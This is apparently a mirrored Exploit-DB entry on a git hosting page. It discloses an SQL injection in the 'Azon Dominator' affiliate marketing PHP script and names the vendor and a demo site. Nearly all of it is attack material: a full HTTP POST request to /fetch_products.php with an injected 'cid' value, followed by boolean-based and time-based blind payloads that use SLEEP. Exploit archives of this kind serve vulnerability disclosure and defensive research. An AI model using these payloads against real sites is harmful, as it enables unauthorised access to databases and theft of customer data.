bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52059.txt
Exploit-DB ec14967376 DB: 2024-07-02 
5 changes to exploits/shellcodes/ghdb

Azon Dominator Affiliate Marketing Script - SQL Injection

Customer Support System 1.0 - Stored XSS

Microweber 2.0.15 - Stored XSS

Xhibiter NFT Marketplace 1.10.2 - SQL Injection
2024-07-02 00:16:21 +00:00

38 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
# Date: 2024-06-03
# Exploit Author: Buğra Enis Dönmez
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
# Demo Site: https://azon-dominator.webister.net/
# Tested on: Arch Linux
# CVE: N/A
### Request ###
POST /fetch_products.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/
Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
Content-Length: 79
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
###
### Parameter & Payloads ###
Parameter: cid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1) AND 7735=7735 AND (5267=5267
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
###
Reference in a new issue View git blame Copy permalink